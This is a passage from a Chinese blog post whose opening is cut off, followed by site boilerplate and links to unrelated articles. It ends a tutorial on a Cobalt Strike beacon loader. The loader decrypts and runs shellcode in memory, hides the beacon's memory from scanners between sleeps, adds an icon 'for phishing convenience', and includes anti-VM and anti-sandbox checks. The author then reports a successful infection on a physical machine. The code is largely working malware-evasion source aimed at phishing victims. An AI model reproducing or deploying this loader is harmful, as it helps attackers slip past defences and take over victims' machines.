ko::Base64::decode(AESDecodedContent);//char* szFilePath = "F:\\Tools\\beacon811.bin";    //BinData = ReadBinaryFile(szFilePath, &size);    //ReadBinaryFile函数能直接读取二进制文件memcpy(shellcode_addr, base64DecodedContent.data(), base64DecodedContent.size());    //将内存复制进去VirtualProtect(shellcode_addr, payload_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);   //修改内存属性(*(int(*)()) shellcode_addr)();UnHook();return 0;
}//整体思路:Beacon进入睡眠就取消它内存的可执行属性,等Beacon线程醒来时触发异常交由VEH异常处理函数恢复内存的可执行属性,然后Beacon执行完成后又进入睡眠一直重复上述过程

在这里插入图片描述
其他代码在ConsoleApplication811中已经写出,需要过去拿即可

接下来为了钓鱼方便,加个ico图标(直接visual studio资源加入就可以),然后加入一些反虚拟检测

if (CheckProcess() == false || checkReg() == true || CheckMemory() == false)
{exit(-1);
}

//虚拟机检测
int check(char* name) {const char* list[2] = { "VBoxService.exe","VBoxTray.exe" };for (int i = 0; i < 2; ++i) {if (strcmp(name, list[i]) == 0)return -1;}return 0;
}bool CheckMemory()
{//定义了一个名为 mst 的 _MEMORYSTATUSEX 结构体变量,用于存储内存状态信息_MEMORYSTATUSEX mst;DWORDLONG d_size = 4294496257;//结构体大小mst.dwLength = sizeof(mst);//GlobalMemoryStatusEx获取当前系统的内存状态信息。GlobalMemoryStatusEx(&mst);//如果内存状态信息中的物理内存总量 mst.ullTotalPhys 小于变量 d_size,则表示系统的物理内存不足if (mst.ullTotalPhys < d_size)return false; //函数返回 false,表示内存不满足要求elsereturn true;  //返回 true,表示内存满足要求
}bool checkReg() {//首先,定义了一个 HKEY 类型的变量 hkey,用于存储打开的注册表键HKEY hkey;//调用 RegOpenKey 函数,传入 HKEY_CLASSES_ROOT(根键),以及字符串 L"\\Applications\\VMwareHostOpen.exe",来尝试打开注册表中的指定键if (RegOpenKey(HKEY_CLASSES_ROOT, L"\\Applications\\VMwareHostOpen.exe", &hkey) == ERROR_SUCCESS){//在键成功打开的情况下,函数返回 true,表示注册表中的键存在return true;}//在键成功打开的情况下,函数返回 true,表示注册表中的键存在else{//在键打开失败的情况下,函数返回 false,表示注册表中的键不存在return false;}
}bool CheckProcess()
{PROCESSENTRY32 pe32;pe32.dwSize = sizeof(pe32);//CreateToolhelp32Snapshot可以通过获取进程信息为指定的进程HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);//要 Process32First 返回成功(非零),就会继续迭代处理每个进程BOOL bResult = Process32First(hProcessSnap, &pe32);while (bResult) {char sz_Name[MAX_PATH] = { 0 };WideCharToMultiByte(CP_ACP, 0, pe32.szExeFile, -1, sz_Name, sizeof(sz_Name), NULL, NULL); //从宽字符转换为多字节字符if (check(sz_Name) == -1) //查进程名是否匹配特定字符串。如果匹配成功(返回值为 -1),则表示检测到了特定进程,函数返回 falsereturn false;bResult = Process32Next(hProcessSnap, &pe32); //获取下一个进程的信息}return true;
}

在这里插入图片描述
在这里插入图片描述
可以看到物理机成功上线,但是虚拟机点击上线不了,成功反沙箱

参考文章:
https://xz.aliyun.com/t/9399
https://github.com/wangfly-me/SysHttpHookSleep

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/110029.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

机器视觉工程师永不为奴,他们是肯干肯出差肯加班肯拼命肯被使唤肯被叼

机器视觉工程师永不为奴,他们是肯干肯出差肯加班肯拼命肯被使唤肯被叼

​ 永不为奴&#xff0c;为什么这样呐喊&#xff0c;真的很难做到。我们职业机器视觉工程师&#xff0c;本身职业具有一大特点就是专业性。 但是我们机器视觉工程师是专业技术绝不苟同于不是技术人员言语&#xff0c;我们很专业。 肯出差&#xff1a; 设备去那里&#xff0c;…
阅读更多...
C#,《小白学程序》第七课:列表(List)应用之一“编制高铁车次信息表”

C#,《小白学程序》第七课:列表(List)应用之一“编制高铁车次信息表”

1 文本格式 /// <summary> /// 车站信息类 class /// </summary> public class Station { /// <summary> /// 编号 /// </summary> public int Id { get; set; } 0; /// <summary> /// 车站名 /// </summary>…
阅读更多...
【优化算法】Python实现面向对象的遗传算法

【优化算法】Python实现面向对象的遗传算法

遗传算法 遗传算法(Genetic Algorithm)属于智能优化算法的一种&#xff0c;本质上是模拟自然界中种群的演化来寻求问题的最优解。与之相似的还有模拟退火、粒子群、蚁群等算法。 在具体介绍遗传算法之前&#xff0c;我们先来了解一些知识&#x1f9c0; DNA&#xff1a; 携带有…
阅读更多...
性能优化之分库分表

性能优化之分库分表

1、什么是分库分表 1.1、分表 将同一个库中的一张表&#xff08;比如SPU表&#xff09;按某种方式&#xff08;垂直拆分、水平拆分&#xff09;拆分成SPU1、SPU2、SPU3、SPU4…等若干张表&#xff0c;如下图所示&#xff1a; 1.2、分库 在表数据不变的情况下&#xff0c;对…
阅读更多...
图像处理 信号处理板 设计原理图:367-基于zynq XC7Z100 FMC接口通用计算平台

图像处理 信号处理板 设计原理图:367-基于zynq XC7Z100 FMC接口通用计算平台

基于zynq XC7Z100 FMC接口通用计算平台 一、板卡概述 板卡由SoC XC7Z100-2FFG900I芯片来完成卡主控及数字信号处理&#xff0c;XC7Z100内部集成了两个ARM Cortex-A9核和一个kintex 7的FPGA&#xff0c;通过PL端FPGA扩展FMC、光纤、IO等接口&#xff0c;PS端ARM扩展网络、USB、R…
阅读更多...
exchange实战

exchange实战

未得到exchange服务器权限 确定exchange服务器ip地址 setspn -T example.domain.com -F -Q */* | findstr exchangeMailSniper 爆破用户名和密码 爆破Exchange邮箱用户名密码&#xff0c;为了防止账号被锁定&#xff0c;所以我们使用密码喷洒攻击&#xff0c;即只使用一个密…
阅读更多...
dolphinschedule配置企微告警服务(WeChat群组)

dolphinschedule配置企微告警服务(WeChat群组)

一、前置说明 ds配置好工作流后&#xff0c;比较重要的一个就是上线后的监控报警服务&#xff0c;如果你是基于企微作为协同办公的&#xff0c;WeChat群组预警必须是要安排上的&#xff0c;文章基于自建应用配合群组方式构建预警群&#xff0c;接入后&#xff0c;任务成功或者…
阅读更多...
sql:SQL优化知识点记录(五)

sql:SQL优化知识点记录(五)

&#xff08;1&#xff09;explain之例子 &#xff08;2&#xff09;索引单表优化案例 上面的功能已经实现&#xff0c;但是分析功能&#xff0c; 使用explain分析这条sql&#xff1a; 发现type为All Extra&#xff1a;有Using filesort &#xff08;文件内排序&#xff09; 这…
阅读更多...
创作2周年纪念日-特别篇

创作2周年纪念日-特别篇

创作2周年纪念日-特别篇 1. 与CSDN的机缘2. 收获3. 憧憬 1. 与CSDN的机缘 很荣幸&#xff0c;在大学时候&#xff0c;能够接触到CSDN这样一个平台&#xff0c;当时对嵌入式开发、编程、计算机视觉等内容比较感兴趣。后面一个很偶然的联培实习机会&#xff0c;让我接触到了Pych…
阅读更多...
浅析Linux SCSI子系统:设备管理

浅析Linux SCSI子系统:设备管理

文章目录 概述设备管理数据结构scsi_host_template&#xff1a;SCSI主机适配器模板scsi_host&#xff1a;SCSI主机适配器主机适配器支持DIF scsi_target&#xff1a;SCSI目标节点scsi_device&#xff1a;SCSI设备 添加主机适配器构建sysfs目录 添加SCSI设备挂载LunIO请求队列初…
阅读更多...
基于Spring Boot的软件缺陷追踪系统的设计与实现(Java+spring boot+MySQL)

基于Spring Boot的软件缺陷追踪系统的设计与实现(Java+spring boot+MySQL)

获取源码或者论文请私信博主 演示视频&#xff1a; 基于Spring Boot的软件缺陷追踪系统的设计与实现&#xff08;Javaspring bootMySQL&#xff09; 使用技术&#xff1a; 前端&#xff1a;html css javascript jQuery ajax thymeleaf 微信小程序 后端&#xff1a;Java spri…
阅读更多...
【HTML】基础语法讲解

【HTML】基础语法讲解

基础语法 1. HTML 结构1.1 认识HTML标签1.2 HTML 文件基本结构1.3 标签层次结构1.4 快速生成代码框架 2. HTML 常见标签2.1 注释标签2.2 标题标签:h1-h62.3 段落标签:p2.4 <br>换行标签2.5 格式化标签2.6 图片标签&#xff1a;img2.7 超链接标签&#xff1a;a2.8 表格标签…
阅读更多...
Flutter问题记录 - Unable to find bundled Java version

Flutter问题记录 - Unable to find bundled Java version

新版本的Android Studio真的移除了JRE&#xff0c;jre目录找不到&#xff0c;怪不得报错了&#xff0c;不过多了一个jbr目录&#xff0c;找了个以前的Android Studio版本对比 搜了一下jbr&#xff08;JetBrains Runtime&#xff09;&#xff0c;原来IDEA老早就开始用了&#xf…
阅读更多...
公网远程访问局域网SQL Server数据库

公网远程访问局域网SQL Server数据库

文章目录 1.前言2.本地安装和设置SQL Server2.1 SQL Server下载2.2 SQL Server本地连接测试2.3 Cpolar内网穿透的下载和安装2.3 Cpolar内网穿透的注册 3.本地网页发布3.1 Cpolar云端设置3.2 Cpolar本地设置 4.公网访问测试5.结语 1.前言 数据库的重要性相信大家都有所了解&…
阅读更多...
Android studio APK切换多个摄像头(Camera2)

Android studio APK切换多个摄像头(Camera2)

1.先设置camera的权限 <uses-permission android:name"android.permission.CAMERA" /> 2.布局 <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas.android.com/apk/res/android"and…
阅读更多...
vue中html引入使用<%= BASE_URL %>变量

vue中html引入使用<%= BASE_URL %>变量

首先使用src相对路径引入 注意&#xff1a; js 文件放在public文件下 不要放在assets静态资源文件下 否则 可能会报错 GET http://192.168.0.113:8080/src/assets/js/websockets.js net::ERR_ABORTED 500 (Internal Server Error) 正确使用如下&#xff1a;eg // html中引…
阅读更多...
go gin 参数绑定常用验证器

go gin 参数绑定常用验证器

https://pkg.go.dev/github.com/go-playground/validator/v10#readme-baked-in-validations min 最小max 最大len 长度限制gt 大于eq 等于ne 不等于eqfield 与某个字段值一样nefield 与某个字段值不一样 package mainimport ("net/http""github.com/gin-gonic…
阅读更多...
7.react useReducer使用与常见问题

7.react useReducer使用与常见问题

useReducer函数 1. useState的替代方案.接收一个(state, action)>newState的reducer, 并返回当前的state以及与其配套的dispatch方法2. 在某些场景下,useReducer会比useState更加适用,例如state逻辑较为复杂, 且**包含多个子值**,或者下一个state依赖于之前的state等清楚us…
阅读更多...
【Leetcode】124.二叉树中的最大路径和(Hard)

【Leetcode】124.二叉树中的最大路径和(Hard)

一、题目 1、题目描述 二叉树中的 路径 被定义为一条节点序列,序列中每对相邻节点之间都存在一条边。同一个节点在一条路径序列中 至多出现一次 。该路径 至少包含一个 节点,且不一定经过根节点。 路径和 是路径中各节点值的总和。 给你一个二叉树的根节点 root ,返回其…
阅读更多...
进行Stable Diffusion的ai训练怎么选择显卡?

进行Stable Diffusion的ai训练怎么选择显卡?

Stable Diffusion主要用于从文本生成图像&#xff0c;是人工智能技术在内容创作行业中不断发展的应用。要在本地计算机上运行Stable Diffusion&#xff0c;您需要一个强大的 GPU 来满足其繁重的要求。强大的 GPU 可以让您更快地生成图像&#xff0c;而具有大量 VRAM 的更强大的…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发